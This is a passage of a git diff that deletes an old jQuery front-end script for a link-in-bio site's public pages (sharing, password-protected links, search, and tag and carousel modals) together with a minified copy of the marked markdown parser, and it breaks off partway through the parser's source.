e.preventDefault() - navigator.share({ - title: $('#PB_share_title').val(), - url: $('#PB_share_link').val(), - }).then(() => { - e.preventDefault() - }) - .catch(); - } -}) - -$('#PUB_LnkPasswordModal').on('show.bs.modal', function(e) { - let id = $(e.relatedTarget).data('id') - $('head').append(''); - $('#PUB_LnkPasswordModal').data('id', id) - - $('#PUB_LnkPasswordModal').find('.modal-running').removeClass('d-none') - $('#PUB_LnkPasswordModal').find('.modal-completed').addClass('d-none') -}) - -$('#PUB_LnkPasswordForm').on('submit', function(e) { - e.preventDefault(); - modalHideErrors($('#PUB_LnkPasswordModal')) - let button = $('#PUB_LnkPasswordSubmit') - LOADING_BUTTON = button - DISABLING_BUTTON = button - button.find('.spinner-grow').remove() - button.append('') - button.attr("disabled", "disabled") - - $.ajax({ - type: "POST", - url: "/api/", - dataType: "json", - data: { - ACTION: "PUB_checkLnkPassword", - password: $('#PUB_LnkPassword').val(), - user_id: $('#LB_UserID').val(), - link_id: $('#PUB_LnkPasswordModal').data('id'), - token: CSFR_TOKEN - }, - success: function (res) { - stopLoadingButton() - reEnableButton() - if (res.status) { - $('#PUB_LnkPasswordModal').find('.modal-running').addClass('d-none') - $('#PUB_LnkPasswordModal').find('.modal-completed').removeClass('d-none') - location.href = res.info.redir - } else { - modalShowErrors($('#PUB_LnkPasswordModal'), res.errors[0]) - } - } - }) -}) - -$('.group-title-collapse-toggle').on('click', function() { - let group_info = $(this).attr("class").match(/group-container-([0-9]+)/); - if (!group_info || group_info.length < 2 || !group_info[1]) { - return - } - let group_id = group_info[1] - if ($('.pb-links.group-container-'+group_id).hasClass('d-none')) { - $('.pb-links.group-container-'+group_id).removeClass('d-none') - $('.group-container-'+group_id).find('.group-toggler-icon').removeClass('fa-chevron-down').addClass('fa-chevron-up') - refreshImages() - footerPositionUpdate() - } else { - $('.pb-links.group-container-'+group_id).addClass('d-none') - $('.group-container-'+group_id).find('.group-toggler-icon').removeClass('fa-chevron-up').addClass('fa-chevron-down') - footerPositionUpdate() - } -}) - -if (location.href.toString().toLowerCase() != 'https://lnk.bio/tiktokuser1907' && location.href.toString().toLowerCase() != 'https://lnk.bio/madison' && false) { - $.ajax({ - type: "POST", - url: "/api/", - dataType: "json", - data: { - ACTION: "PUB_ping", - page: location.href.toString(), - title: document.title - } - }) -} - -$('.LB_countdown').each(function(){ - let date = $(this).data('date') - let div = $(this); - x = setInterval(function() { - LB_Countdown(date, div) - }, 1000) - }) - -$('form[name="public-search-form"]').on('submit', function(e) { - e.preventDefault() - let inp = $(this).find('input.public-search-input') - if (!inp.val()) { - return - } - $('#PUB_LnkSearchModal').data('search', inp.val()) - $('#PUB_LnkSearchModal').modal('show') -}) - -$('#PUB_LnkSearchModal').on('submit', 'form[name="public-search-form"]', function(e) { - e.preventDefault() - let inp = $(this).find('input.public-search-input') - if (!inp.val()) { - return - } - $('#PUB_LnkSearchModal').data('search', inp.val()) - initLnkSearch() -}) - -$('#PUB_LnkSearchModal').on('show.bs.modal', function() { - initLnkSearch() -}) - -function initLnkSearch() { - modalIsLoading($('#PUB_LnkSearchModal')) - let search_val = $('#PUB_LnkSearchModal').data('search'); - if (!search_val) { - $('#PUB_LnkSearchModal').modal('hide') - } - if (typeof (NONCE) == "undefined") { - NONCE = "" - } - if (typeof (NONCE_TIME) == "undefined") { - NONCE_TIME = 0 - } - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'PUB_search', - nonce: NONCE, - nonce_time: NONCE_TIME, - user_id: $('#LB_UserID').val(), - search: search_val, - token: CSFR_TOKEN - }, - success: function (res) { - if (res.status) { - modalHasLoaded($('#PUB_LnkSearchModal')) - $('#PUB_LnkSearchModal').find('input.public-search-input').val(res.info.search) - let txt = '' - for (const key in res.info.links) { - if (Object.hasOwnProperty.call(res.info.links, key)) { - const element = res.info.links[key].join(' ') - txt += element - } - } - $('#PUB_LnkSearchModal').find('.search-results').html(txt) - refreshImages() - } - } - }); -} -$('#PUB_LnkSearchModal').on('scroll', function () { - refreshImages() -}); -$('#PUB_LnkSearchModal').find('.modal-body').on('scroll', function () { - refreshImages() -}); - - - -function checkTagsModalHeight() { - if((window.innerHeight - 50) < $('#PUB_LnkMultiModal').find('.modal-dialog').height()) { - $('#PUB_LnkMultiModal').addClass('modal-fullscreen') - $('#PUB_LnkMultiModal').find('.modal-header').addClass('modal-header-fullscreen') - $('#PUB_LnkMultiModal').data('noslidedown', true); - } else { - $('#PUB_LnkMultiModal').removeClass('modal-fullscreen') - $('#PUB_LnkMultiModal').find('.modal-header').removeClass('modal-header-fullscreen') - $('#PUB_LnkMultiModal').data('noslidedown', false); - } -} - -$('#PUB_LnkMultiModal').find('.tag-img-container img').on('load', function() { - setTimeout(function() {checkTagsModalHeight()}, 500) - -}) - -$('#PUB_LnkMultiModal').on('show.bs.modal', function(e) { - checkTagsModalHeight() - modalIsLoading($('#PUB_LnkMultiModal')) - let link = $(e.relatedTarget) - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'PUB_getTag', - nonce: NONCE, - nonce_time: NONCE_TIME, - user_id: $('#LB_UserID').val(), - link_id: link.data('id'), - token: CSFR_TOKEN - }, - success: function (res) { - if (res.status) { - modalHasLoaded($('#PUB_LnkMultiModal')) - $('#PUB_LnkMultiModal').find('.tag-img-container div').remove() - $('#PUB_LnkMultiModal').find('.tag-img-container').append(res.info.tags) - $('#PUB_LnkMultiModal').find('.tag-img-container img').attr('src', res.info.img) - $('#PUB_LnkMultiModal').find('.tag-links-container').html(res.info.buttons) - checkTagsModalHeight() - } - } - }); -}) - - - -function checkCarouselModalHeight() { - if((window.innerHeight - 50) < $('#PUB_LnkCarouselModal').find('.modal-dialog').height()) { - $('#PUB_LnkCarouselModal').addClass('modal-fullscreen') - $('#PUB_LnkCarouselModal').find('.modal-header').addClass('modal-header-fullscreen') - $('#PUB_LnkCarouselModal').data('noslidedown', true); - } else { - $('#PUB_LnkCarouselModal').removeClass('modal-fullscreen') - $('#PUB_LnkCarouselModal').find('.modal-header').removeClass('modal-header-fullscreen') - $('#PUB_LnkCarouselModal').data('noslidedown', false); - } -} - -$('#PUB_LnkCarouselModal').on('show.bs.modal', function(e) { - checkCarouselModalHeight() - modalIsLoading($('#PUB_LnkCarouselModal')) - let link = $(e.relatedTarget) - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'PUB_getCarousel', - nonce: NONCE, - nonce_time: NONCE_TIME, - user_id: $('#LB_UserID').val(), - link_id: link.data('id'), - token: CSFR_TOKEN - }, - success: function (res) { - if (res.status) { - checkCarouselModalHeight() - $('#PUB_LnkCarouselModal').find('.modal-title').text(res.info.title) - $('#PUB_LnkCarouselModal').find('.loaded-container').html(res.info.html) - modalHasLoaded($('#PUB_LnkCarouselModal')) - $('.lnk-carousel-container').slick({ - dots: true, - autoplay: false, - arrows: true, - initialSlide: 0, - prevArrow:"", - nextArrow:"" - }); - setTimeout(function() { checkCarouselModalHeight()}, 700) - } - } - }); -}) \ No newline at end of file diff --git a/old/js/marked.min.js b/old/js/marked.min.js deleted file mode 100644 index 94765ad..0000000 --- a/old/js/marked.min.js +++ /dev/null @@ -1,6 +0,0 @@ -/** - * marked v13.0.2 - a markdown parser - * Copyright (c) 2011-2024, Christopher Jeffrey. (MIT Licensed) - * https://github.com/markedjs/marked - */ -!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e="undefined"!=typeof globalThis?globalThis:e||self).marked={})}(this,(function(e){"use strict";function t(){return{async:!1,breaks:!1,extensions:null,gfm:!0,hooks:null,pedantic:!1,renderer:null,silent:!1,tokenizer:null,walkTokens:null}}function n(t){e.defaults=t}e.defaults={async:!1,breaks:!1,extensions:null,gfm:!0,hooks:null,pedantic:!1,renderer:null,silent:!1,tokenizer:null,walkTokens:null};const s=/[&<>"']/,r=new RegExp(s.source,"g"),i=/[<>"']|&(?!(#\d{1,7}|#[Xx][a-fA-F0-9]{1,6}|\w+);)/,l=new RegExp(i.source,"g"),o={"&":"&","<":"<",">":">",'"':""","'":"'"},a=e=>o[e];function c(e,t){if(t){if(s.test(e))return e.replace(r,a)}else if(i.test(e))return e.replace(l,a);return e}const h=/&(#(?:\d+)|(?:#x[0-9A-Fa-f]+)|(?:\w+));?/gi;const p=/(^|[^\[])\^/g;function u(e,t){let n="string"==typeof e?e:e.source;t=t||"";const s={replace:(e,t)=>{let r="string"==typeof t?t:t.source;return r=r.replace(p,"$1"),n=n.replace(e,r),s},getRegex:()=>new RegExp(n,t)};return s}function k(e){try{e=encodeURI(e).replace(/%25/g,"%")}catch(e){return null}return e}const g={exec:()=>null};function f(e,t){const n=e.replace(/\|/g,((e,t,n)=>{let s=!1,r=t;for(;--r>=0&&"\\"===n[r];)s=!s;return s?"|":" |"})).split(/ \|/);let s=0;if(n[0].trim()||n.shift(),n.length>0&&!n[n.length-1].trim()&&n.pop(),t)if(n.length>t)n.splice(t);else for(;n.length0)return{type:"space",raw:t[0]}}code(e){const t=this.rules.block.code.exec(e);if(t){const e=t[0].replace(/^ {1,4}/gm,"");return{type:"code",raw:t[0],codeBlockStyle:"indented",text:this.options.pedantic?e:d(e,"\n")}}}fences(e){const t=this.rules.block.fences.exec(e);if(t){const e=t[0],n=function(e,t){const n=e.match(/^(\s+)(?:```)/);if(null===n)return t;const s=n[1];return t.split("\n").map((e=>{const t=e.match(/^\s+/);if(null===t)return e;const[n]=t;return n.length>=s.length?e.slice(s.length):e})).join("\n")}(e,t[3]||"");return{type:"code",raw:e,lang:t[2]?t[2].trim().replace(this.rules.inline.anyPunctuation,"$1"):t[2],text:n}}}heading(e){const t=this.rules.block.heading.exec(e);if(t){let e=t[2].trim();if(/#$/.test(e)){const t=d(e,"#");this.options.pedantic?e=t.trim():t&&!/ $/.test(t)||(e=t.trim())}return{type:"heading",raw:t[0],depth:t[1].length,text:e,tokens:this.lexer.inline(e)}}}hr(e){const t=this.rules.block.hr.exec(e);if(t)return{type:"hr",raw:d(t[0],"\n")}}blockquote(e){const t=this.rules.block.blockquote.exec(e);if(t){let e=d(t[0],"\n").split("\n"),n="",s="";const r=[];for(;e.length>0;){let t=!1;const i=[];let l;for(l=0;l/.test(e[l]))i.push(e[l]),t=!0;else{if(t)break;i.push(e[l])}e=e.slice(l);const o=i.join("\n"),a=o.replace(/\n {0,3}((?:=+|-+) *)(?=\n|$)/g,"\n $1").replace(/^ {0,3}>[ \t]?/gm,"");n=n?`${n}\n${o}`:o,s=s?`${s}\n${a}`:a;const c=this.lexer.state.top;if(this.lexer.state.top=!0,this.lexer.blockTokens(a,r,!0),this.lexer.state.top=c,0===e.length)break;const h=r[r.length-1];if("code"===h?.type)break;if("blockquote"===h?.type){const t=h,i=t.raw+"\n"+e.join("\n"),l=this.blockquote(i);r[r.length-1]=l,n=n.substring(0,n.length-t.raw.length)+l.raw,s=s.substring(0,s.length-t.text.length)+l.text;break}if("list"!==h?.type);else{const t=h,i=t.raw+"\n"+e.join("\n"),l=this.list(i);r[r.length-1]=l,n=n.substring(0,n.length-h.raw.length)+l.raw,s=s.substring(0,s.length-t.raw.length)+l.raw,e=i.substring(r[r.length-1].raw.length).split("\n")}}return{type:"blockquote",raw:n,tokens:r,text:s}}}list(e){let t=this.rules.block.list.exec(e);if(t){let n=t[1].trim();const s=n.length>1,r={type:"list",raw:"",ordered:s,start:s?+n.slice(0,-1):"",loose:!1,items:[]};n=s?`\\d{1,9}\\${n.slice(-1)}`:`\\${n}`,this.options.pedantic&&(n=s?n:"[*+-]");const i=new RegExp(`^( {0,3}${n})((?:[\t ][^\\n]*)?(?:\\n|$))`);let l=!1;for(;e;){let n=!1,s="",o="";if(!(t=i.exec(e)))break;if(this.rules.block.hr.test(e))break;s=t[0],e=e.substring(s.length);let a=t[2].split("\n",1)[0].replace(/^\t+/,(e=>" ".repeat(3*e.length))),c=e.split("\n",1)[0],h=!a.trim(),p=0;if(this.options.pedantic?(p=2,o=a.trimStart()):h?p=t[1].length+1:(p=t[2].search(/[^ ]/),p=p>4?1:p,o=a.slice(p),p+=t[1].length),h&&/^ *$/.test(c)&&(s+=c+"\n",e=e.substring(c.length+1),n=!0),!n){const t=new RegExp(`^ {0,${Math.min(3,p-1)}}(?:[*+-]|\\d{1,9}[.)])((?:[ \t][^\\n]*)?(?:\\n|$))`),n=new RegExp(`^ {0,${Math.min(3,p-1)}}((?:- *){3,}|(?:_ *){3,}|(?:\\* *){3,})(?:\\n+|$)`),r=new RegExp(`^ {0,${Math.min(3,p-1)}}(?:\`\`\`|~~~)`),i=new RegExp(`^ {0,${Math.min(3,p-1)}}#`);for(;e;){const l=e.split("\n",1)[0];if(c=l,this.options.pedantic&&(c=c.replace(/^ {1,4}(?=( {4})*[^ ])/g," ")),r.test(c))break;if(i.test(c))break;if(t.test(c))break;if(n.test(e))break;if(c.search(/[^ ]/)>=p||!c.trim())o+="\n"+c.slice(p);else{if(h)break;if(a.search(/[^ ]/)>=4)break;if(r.test(a))break;if(i.test(a))break;if(n.test(a))break;o+="\n"+c}h||c.trim()||(h=!0),s+=l+"\n",e=e.substring(l.length+1),a=c.slice(p)}}r.loose||(l?r.loose=!0:/\n *\n *$/.test(s)&&(l=!0));let u,k=null;this.options.gfm&&(k=/^\[[ xX]\] /.exec(o),k&&(u="[ ] "!==k[0],o=o.replace(/^\[[ xX]\] +/,""))),r.items.push({type:"list_item",raw:s,task:!!k,checked:u,loose:!1,text:o,tokens:[]}),r.raw+=s}r.items[r.items.length-1].raw=r.items[r.items.length-1].raw.trimEnd(),r.items[r.items.length-1].text=r.items[r.items.length-1].text.trimEnd(),r.raw=r.raw.trimEnd();for(let e=0;e"space"===e.type)),n=t.length>0&&t.some((e=>/\n.*\n/.test(e.raw)));r.loose=n}if(r.loose)for(let e=0;e$/,"$1").replace(this.rules.inline.anyPunctuation,"$1"):"",s=t[3]?t[3].substring(1,t[3].length-1).replace(this.rules.inline.anyPunctuation,"$1"):t[3];return{type:"def",tag:e,raw:t[0],href:n,title:s}}}table(e){const t=this.rules.block.table.exec(e);if(!t)return;if(!/[:|]/.test(t[2]))return;const n=f(t[1]),s=t[2].replace(/^\||\| *$/g,"").split("|"),r=t[3]&&t[3].trim()?t[3].replace(/\n[ \t]*$/,"").split("\n"):[],i={type:"table",raw:t[0],header:[],align:[],rows:[]};if(n.length===s.length){for(const e of s)/^ *-+: *$/.test(e)?i.align.push("right"):/^ *:-+: *$/.test(e)?i.align.push("center"):/^ *:-+ *$/.test(e)?i.align.push("left"):i.align.push(null);for(let e=0;e({text:e,tokens:this.lexer.inline(e),header:!1,align:i.align[t]}))));return i}}lheading(e){const t=this.rules.block.lheading.exec(e);if(t)return{type:"heading",raw:t[0],depth:"="===t[2].charAt(0)?1:2,text:t[1],tokens:this.lexer.inline(t[1])}}paragraph(e){const t=this.rules.block.paragraph.exec(e);if(t){const e="\n"===t[1].charAt(t[1].length-1)?t[1].slice(0,-1):t[1];return{type:"paragraph",raw:t[0],text:e,tokens:this.lexer.inline(e)}}}text(e){const t=this.rules.block.text.exec(e);if(t)return{type:"text",raw:t[0],text:t[0],tokens:this.lexer.inline(t[0])}}escape(e){const t=this.rules.inline.escape.exec(e);if(t)return{type:"escape",raw:t[0],text:c(t[1])}}tag(e){const t=this.rules.inline.tag.exec(e);if(t)return!this.lexer.state.inLink&&/^/i.test(t[0])&&(this.lexer.state.inLink=!1),!this.lexer.state.inRawBlock&&/^<(pre|code|kbd|script)(\s|>)/i.test(t[0])?this.lexer.state.inRawBlock=!0:this.lexer.state.inRawBlock&&/^<\/(pre|code|kbd|script)(\s|>)/i.test(t[0])&&(this.lexer.state.inRawBlock=!1),{type:"html",raw:t[0],inLink:this.lexer.state.inLink,inRawBlock:this.lexer.state.inRawBlock,block:!1,text:t[0]}}link(e){const t=this.rules.inline.link.exec(e);if(t){const e=t[2].trim();if(!this.options.pedantic&&/^$/.test(e))return;const t=d(e.slice(0,-1),"\\");if((e.length-t.length)%2==0)return}else{const e=function(e,t){if(-1===e.indexOf(t[1]))return-1;let n=0;for(let s=0;s-1){const n=(0===t[0].indexOf("!")?5:4)+t[1].length+e;t[2]=t[2].substring(0,e),t[0]=t[0].substring(0,n).trim(),t[3]=""}}let n=t[2],s="";if(this.options.pedantic){const e=/^([^'"]*[^\s])\s+(['"])(.*)\2/.exec(n);e&&(n=e[1],s=e[3])}else s=t[3]?t[3].slice(1,-1):"";return n=n.trim(),/^$/.test(e)?n.slice(1):n.slice(1,-1)),x(t,{href:n?n.replace(this.rules.inline.anyPunctuation,"$1"):n,title:s?s.replace(this.rules.inline.anyPunctuation,"$1"):s},t[0],this.lexer)}}reflink(e,t){let n;if((n=this.rules.inline.reflink.exec(e))||(n=this.rules.inline.nolink.exec(e))){const e=t[(n[2]||n[1]).replace(/\s+/g," ").toLowerCase()];if(!e){const e=n[0].charAt(0);return{type:"text",raw:e,text:e}}return x(n,e,n[0],this.lexer)}}emStrong(e,t,n=""){let s=this.rules.inline.emStrongLDelim.exec(e);if(!s)return;if(s[3]&&n.match(/[\p{L}\p{N}]/u))return;if(!(s[1]||s[2]||"")||!n||this.rules.inline.punctuation.exec(n)){const n=[...s[0]].length-1;let r,i,l=n,o=0;const a="*"===s[0][0]?this.rules.inline.emStrongRDelimAst:this.rules.inline.emStrongRDelimUnd;for(a.lastIndex=0,t=t.slice(-1*e.length+n);null!=(s=a.exec(t));){if(r=s[1]||s[2]||s[3]||s[4]||s[5]||s[6],!r)continue;if(i=[...r].length,s[3]||s[4]){l+=i;continue}if((s[5]||s[6])&&n%3&&!((n+i)%3)){o+=i;continue}if(l-=i,l>0)continue;i=Math.min(i,i+l+o);const t=[...s[0]][0].length,a=e.slice(0,n+s.index+t+i);if(Math.min(n,i)%2){const e=a.slice(1,-1);return{type:"em",raw:a,text:e,tokens:this.lexer.inlineTokens(e)}}const c=a.slice(2,-2);return{type:"strong",raw:a,text:c,tokens:this.lexer.inlineTokens(c)}}}}codespan(e){const t=this.rules.inline.code.exec(e);if(t){let e=t[2].replace(/\n/g," ");const n=/[^ ]/.test(e),s=/^ /.test(e)&&/ $/.test(e);return n&&s&&(e=e.substring(1,e.length-1)),e=c(e,!0),{type:"codespan",raw:t[0],text:e}}}br(e){const t=this.rules.inline.br.exec(e);if(t)return{type:"br",raw:t[0]}}del(e){const t=this.rules.inline.del.exec(e);if(t)return{type:"del",raw:t[0],text:t[2],tokens:this.lexer.inlineTokens(t[2])}}autolink(e){const t=this.rules.inline.autolink.exec(e);if(t){let e,n;return"@"===t[2]?(e=c(t[1]),n="mailto:"+e):(e=c(t[1]),n=e),{type:"link",raw:t[0],text:e,href:n,tokens:[{type:"text",raw:e,text:e}]}}}url(e){let t;if(t=this.rules.inline.url.exec(e)){let e,n;if("@"===t[2])e=c(t[0]),n="mailto:"+e;else{let s;do{s=t[0],t[0]=this.rules.inline._backpedal.exec(t[0])?.[0]??""}while(s!==t[0]);e=c(t[0]),n="www."===t[1]?"http://"+t[0]:t[0]}return{type:"link",raw:t[0],text:e,href:n,tokens:[{type:"text",raw:e,text:e}]}}}inlineText(e){const t=this.rules.inline.text.exec(e);if(t){let e;return e=this.lexer.state.inRawBlock?t[0]:c(t[0]),{type:"text",raw:t[0],text:e}}}}const w=/^ {0,3}((?:-[\t ]*){3,}|(?:_[ \t]*){3,}|(?:\*[ \t]*){3,})(?:\n+|$)/,m=/(?:[*+-]|\d{1,9}[.)])/,y=u(/^(?!bull |blockCode|fences|blockquote|heading|html)((?:.|\n(?!\s*?\n|bull |blockCode|fences|blockquote|heading|html))+?)\n {0,3}(=+|-+) *(?:\n+|$)/).replace(/bull/g,m).replace(/blockCode/g,/ {4}/).replace(/fences/g,/ {0,3}(?:`{3,}|~{3,})/).replace(/blockquote/g,/ {0,3}>/).replace(/heading/g,/ {0,3}#{1,6}/).replace(/html/g,/ {0,3}<[^\n>]+>\n/).getRegex(),$=/^([^\n]+(?:\n(?!hr|heading|lheading|blockquote|fences|list|html|table| +\n)[^\n]+)*)/,z=/(?!\s*\])(?:\\.|[^\[\]\\])+/,T=u(/^ {0,3}\[(label)\]: *(?:\n *)?([^<\s][^\s]*|<.*?>)(?:(?: +(?:\n *)?| *\n *)(title))? *(?:\n+|$)/).replace("label",z).replace("title",/(?:"(?:\\"?|[^"\\])*"|'[^'\n]*(?:\n[^'\n]+)*\n?'|\([^()]*\))/).getRegex(),R=u(/^( {0,3}bull)([ \t][^\n]+?)?(?:\n|$)/).replace(/bull/g,m).getRegex(),_="address|article|aside|base|basefont|blockquote|body|caption|center|col|colgroup|dd|details|dialog|dir|div|dl|dt|fieldset|figcaption|figure|footer|form|frame|frameset|h[1-6]|head|header|hr|html|iframe|legend|li|link|main|menu|menuitem|meta|nav|noframes|ol|optgroup|option|p|param|search|section|summary|table|tbody|td|tfoot|th|thead|title|tr|track|ul",A=/|$))/,S=u("^ {0,3}(?:<(script|pre|style|textarea)[\\s>][\\s\\S]*?(?:[^\\n]*\\n+|$)|comment[^\\n]*(\\n+|$)|<\\?[\\s\\S]*?(?:\\?>\\n*|$)|\\n*|$)|\\n*|$)|)[\\s\\S]*?(?:(?:\\n *)+\\n|$)|<(?!script|pre|style|textarea)([a-z][\\w-]*)(?:attribute)*? */?>(?=[ \\t]*(?:\\n|$))[\\s\\S]*?(?:(?:\\n *)+\\n|$)|(?=[ \\t]*(?:\\n|$))[\\s\\S]*?(?:(?:\\n *)+\\n|$))","i").replace("comment",A).replace("tag",_).replace("attribute",/ +[a-zA-Z:_][\w.:-]*(?: *= *"[^"\n]*"| *= *'[^'\n]*'| *= *[^\s"'=<>`]+)?/).getRegex(),I=u($).replace("hr",w).replace("heading"," {0,3}#{1,6}(?:\\s|$)").replace("|lheading","").replace("|table","").replace("blockquote"," {0,3}>").replace("fences"," {0,3}(?:`{3,}(?=[^`\\n]*\\n)|~{3,})[^\\n]*\\n").replace("list"," {0,3}(?:[*+-]|1[.)]) ").replace("html",")|<(?:script|pre|style|textarea|!--)").replace("tag",_).getRegex(),E={blockquote:u(/^( {0,3}> ?(paragraph|[^\n]*)(?:\n|$))+/).replace("paragraph",I).getRegex(),code:/^( {4}[^\n]+(?:\n(?: *(?:\n|$))*)?)+/,def:T,fences:/^ {0,3}(`{3,}(?=[^`\n]*(?:\n|$))|~{3,})([^\n]*)(?:\n|$)(?:|([\s\S]*?)(?:\n|$))(?: {0,3}\1[~`]* *(?=\n|$)|$)/,heading:/^ {0,3}(#{1,6})(?=\s|$)(.*)(?:\n+|$)/,hr:w,html:S,lheading:y,list:R,newline:/^(?: *(?:\n|$))+/,paragraph:I,table:g,text:/^[^\n]+/},q=u("^ *([^\\n ].*)\\n {0,3}((?:\\| *)?:?-+:? *(?:\\| *:?-+:? *)*(?:\\| *)?)(?:\\n((?:(?! *\\n|hr|heading|blockquote|code|fences|list|html).*(?:\\n|$))*)\\n*|$)").replace("hr",w).replace("heading"," {0,3}#{1,6}(?:\\s|$)").replace("blockquote"," {0,3}>").replace("code"," {4}[^\\n]").replace("fences"," {0,3}(?:`{3,}(?=[^`\\n]*\\n)|~{3,})[^\\n]*\\n").replace("list"," {0,3}(?:[*+-]|1[.)]) ").replace("html",")|<(?:script|pre|style|textarea|!--)").replace("tag",_).getRegex(),Z={...E,table:q,paragraph:u($).replace("hr",w).replace("heading"," {0,3}#{1,6}(?:\\s|$)").replace("|lheading","").replace("table",q).replace("blockquote"," {0,3}>").replace("fences"," {0,3}(?:`{3,}(?=[^`\\n]*\\n)|~{3,})[^\\n]*\\n").replace("list"," {0,3}(?:[*+-]|1[.)]) ").replace("html",")|<(?:script|pre|style|textarea|!--)").replace("tag",_).getRegex()},L={...E,html:u("^ *(?:comment *(?:\\n|\\s*$)|<(tag)[\\s\\S]+? *(?:\\n{2,}|\\s*$)|\\s]*)*?/?> *(?:\\n{2,}|\\s*$))").replace("comment",A).replace(/tag/g,"(?!(?:a|em|strong|small|s|cite|q|dfn|abbr|data|time|code|var|samp|kbd|sub|sup|i|b|u|mark|ruby|rt|rp|bdi|bdo|span|br|wbr|ins|del|img)\\b)\\w+(?!:|[^\\w\\s@]*@)\\b").getRegex(),def:/^ *\[([^\]]+)\]: *]+)>?(?: +(["(][^\n]+[")]))? *(?:\n+|$)/,heading:/^(#{1,6})(.*)(?:\n+|$)/,fences:g,lheading:/^(.+?)\n {0,3}(=+|-+) *(?:\n+|$)/,paragraph:u($).replace("hr",w).replace("heading"," *#{1,6} *[^\n]").replace("lheading",y).replace("|table","").replace("blockquote"," {0,3}>").replace("|fences","").replace("|list","").replace("|html","").replace("|tag","").getRegex()},P=/^\\([!"#$%&'()*+,\-./:;<=>?@\[\]\\^_`{|}~])/,v=/^( {2,}|\\)\n(?!\s*$)/,Q="\\p{P}\\p{S}",B=u(/^((?![*_])[\spunctuation])/,"u").replace(/punctuation/g,Q).getRegex(),C=u(/^(?:\*+(?:((?!\*)[punct])|[^\s*]))|^_+(?:((?!_)[punct])|([^\s_]))/,"u").replace(/punct/g,Q).getRegex(),M=u("^[^_*]*?__[^_*]*?\\*[^_*]*?(?=__)|[^*]+(?=[^*])|(?!\\*)[punct](\\*+)(?=[\\s]|$)|[^punct\\s](\\*+)(?!\\*)(?=[punct\\s]|$)|(?!\\*)[punct\\s](\\*+)(?=[^punct\\s])|[\\s](\\*+)(?!\\*)(?=[punct])|(?!\\*)[punct](\\*+)(?!\\*)(?=[punct])|[^punct\\s](\\*+)(?=[^punct\\s])","gu").replace(/punct/g,Q).getRegex(),O=u("^[^_*]*?\\*\\*[^_*]*?_[^_*]*?(?=\\*\\*)|[^_]+(?=[^_])|(?!_)[punct](_+)(?=[\\s]|$)|[^punct\\s](_+)(?!_)(?=[punct\\s]|$)|(?!_)[punct\\s](_+)(?=[^punct\\s])|[\\s](_+)(?!_)(?=[punct])|(?!_)[punct](_+)(?!_)(?=[punct])","gu").replace(/punct/g,Q).getRegex(),j=u(/\\([punct])/,"gu").replace(/punct/g,Q).getRegex(),D=u(/^<(scheme:[^\s\x00-\x1f<>]*|email)>/).replace("scheme",/[a-zA-Z][a-zA-Z0-9+.-]{1,31}/).replace("email",/[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+(@)[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)+(?![-_])/).getRegex(),H=u(A).replace("(?:--\x3e|$)","--\x3e").getRegex(),F=u("^comment|^|^<[a-zA-Z][\\w-]*(?:attribute)*?\\s*/?>|^<\\?[\\s\\S]*?\\?>|^|^").replace("comment",H).replace("attribute",/\s+[a-zA-Z:_][\w.:-]*(?:\s*=\s*"[^"]*"|\s*=\s*'[^']*'|\s*=\s*[^\s"'=<>`]+)?/).getRegex(),U=/(?:\[(?:\\.|[^\[\]\\])*\]|\\.|`[^`]*`|[^\[\]\\`])*?/,X=u(/^!?\[(label)\]\(\s*(href)(?:\s+(title))?\s*\)/).replace("label",U).replace("href",/<(?:\\.|[^\n<>\\])+>|[^\s\x00-\x1f]*/).replace("title",/"(?:\\"?|[^"\\])*"|'(?:\\'?|[^'\\])*'|\((?:\\\)?|[^)\\])*\)/).getRegex(),N=u(/^!?\[(label)\]\[(ref)\]/).replace("label",U).replace("ref",z).getRegex(),G=u(/^!?\[(ref)\](?:\[\])?/).replace("ref",z).getRegex(),J={_backpedal:g,anyPunctuation:j,autolink:D,blockSkip:/\[[^[\]]*?\]\([^\(\)]*?\)|`[^`]*?`|<[^<>]*?>/g,br:v,code:/^(`+)([^`]|[^`][\s\S]*?[^`])\1(?!`)/,del:g,emStrongLDelim:C,emStrongRDelimAst:M,emStrongRDelimUnd:O,escape:P,link:X,nolink:G,punctuation:B,reflink:N,reflinkSearch:u("reflink|nolink(?!\\()","g").replace("reflink",N).replace("nolink",G).getRegex(),tag:F,text:/^(`+|[^`])(?:(?= {2,}\n)|[\s\S]*?(?:(?=[\\t+" ".repeat(n.length)));e;)if(!(this.options.extensions&&this.options.extensions.block&&this.options.extensions.block.some((n=>!!(s=n.call({lexer:this},e,t))&&(e=e.substring(s.raw.length),t.push(s),!0)))))if(s=this.tokenizer.space(e))e=e.substring(s.raw.length),1===s.raw.length&&t.length>0?t[t.length-1].raw+="\n":t.push(s);else if(s=this.tokenizer.code(e))e=e.substring(s.raw.length),r=t[t.length-1],!r||"paragraph"!==r.type&&"text"!==r.type?t.push(s):(r.raw+="\n"+s.raw,r.text+="\n"+s.text,this.inlineQueue[this.inlineQueue.length-1].src=r.text);else if(s=this.tokenizer.fences(e))e=e.substring(s.raw.length),t.push(s);else if(s=this.tokenizer.heading(e))e=e.substring(s.raw.length),t.push(s);else if(s=this.tokenizer.hr(e))e=e.substring(s.raw.length),t.push(s);else if(s=this.tokenizer.blockquote(e))e=e.substring(s.raw.length),t.push(s);else if(s=this.tokenizer.list(e))e=e.substring(s.raw.length),t.push(s);else if(s=this.tokenizer.html(e))e=e.substring(s.raw.length),t.push(s);else if(s=this.tokenizer.def(e))e=e.substring(s.raw.length),r=t[t.length-1],!r||"paragraph"!==r.type&&"text"!==r.type?this.tokens.links[s.tag]||(this.tokens.links[s.tag]={href:s.href,title:s.title}):(r.raw+="\n"+s.raw,r.text+="\n"+s.raw,this.inlineQueue[this.inlineQueue.length-1].src=r.text);else if(s=this.tokenizer.table(e))e=e.substring(s.raw.length),t.push(s);else if(s=this.tokenizer.lheading(e))e=e.substring(s.raw.length),t.push(s);else{if(i=e,this.options.extensions&&this.options.extensions.startBlock){let t=1/0;const n=e.slice(1);let 